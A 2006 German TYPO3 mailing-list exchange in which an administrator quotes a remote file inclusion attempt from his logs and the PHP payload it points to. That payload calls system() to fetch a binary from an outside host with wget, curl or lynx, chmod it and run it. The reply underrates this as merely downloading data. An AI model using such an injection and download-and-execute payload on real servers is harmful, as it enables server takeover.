[TYPO3-german] Komische Anfrage an mein Typo3

Andreas Balzer eMail at andreas-balzer.de
Thu Aug 31 22:53:18 CEST 2006


Christian Leicht schrieb:
> Hallo
> 
> ich habe gerade meine Logfiles einer T3 installation durchgeschaut und
> folgenes gefunden:
> 
> index.php?id=34&L=http://abuser.republika.pl/test
> 
> Versucht da jemand meine Seite zu knacken? Wenn ich dem Link nachgehe
> kommt dieses php Script zum Vorschein:
> 
> <?
> 
> echo 'm4k4bra - mamy cie';
> 
> system('cd /var/tmp;wget http://abuser.republika.pl/kt2; if [ ! -e ./kt2
> ]; then curl http://abuser.republika.pl/kt2 > kt2;fi;if [ ! -e ./kt2
> ];then lynx -dump http://abuser.republika.pl/kt2 >kt2; fi; chmod 777
> kt2; ./kt2&');
> 
> ?>
> 
> Christian
Hi! Ich weiß zwar nicht genau was das Script macht, aber es scheint
darauf konzipiert zu sein, eine Menge Daten runterzuladen. An deiner
Stelle würde ich es vorerst sperren.. Schaden kann das sperren ja nie..
(reine Sicherheitsmaßnahme..)

Grüße
Andreas



More information about the TYPO3-german mailing list